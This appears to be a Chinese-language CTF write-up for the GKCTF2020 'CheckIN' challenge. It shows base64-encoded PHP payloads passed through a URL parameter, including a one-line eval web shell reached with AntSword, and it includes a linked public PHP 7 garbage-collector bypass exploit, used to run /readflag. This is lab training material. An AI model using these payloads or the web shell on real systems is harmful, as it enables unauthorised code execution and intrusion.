GKCTF2020 CheckIN Writeup

打开实例是一段PHP代码。

代码图

通过代码没有发现反序列化函数,但是可以通过Ginkgo传参,但必须要传经过base64编码后的。上传phpinfo();试试,顺便看看php版本,将**phpinfo();**经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==

如下图

上传个一句话木马试试,将**eval($_POST[a]);**经base64编码后上传

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbYV0pOw==

使用蚁剑连接试试

连接成功

连接成功后,查看根目录

发现有flag文件,但权限不够看不了。readflag打开后乱码,于是想到执行readflag获取flag内容。但怎么执行呢,我也不会了,看wp后知道。php版本为7.3,这个版本有一个漏洞,php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令影响范围是linux,php7.0-7.3给出了exp
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php下载后进行修改,改为pwn("/readflag");,注意我这里将exploits.php文件改名为了111.php

上传挨个试,发现tmp可以上传,于是就上传到tmp中。进入tmp目录中,右键,然后点上传。上传成功后,执行文件包含。将include('/tmp/111.php');经base64编码后上传。

payload:http://346a26d6-b3a8-4b3f-b923-0ead34c60089.node3.buuoj.cn/?Ginkgo=aW5jbHVkZSgnL3RtcC8xMTEucGhwJyk7

得出flag

这题难就难在那个执行readflag,以后要注意不同php版本的漏洞。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值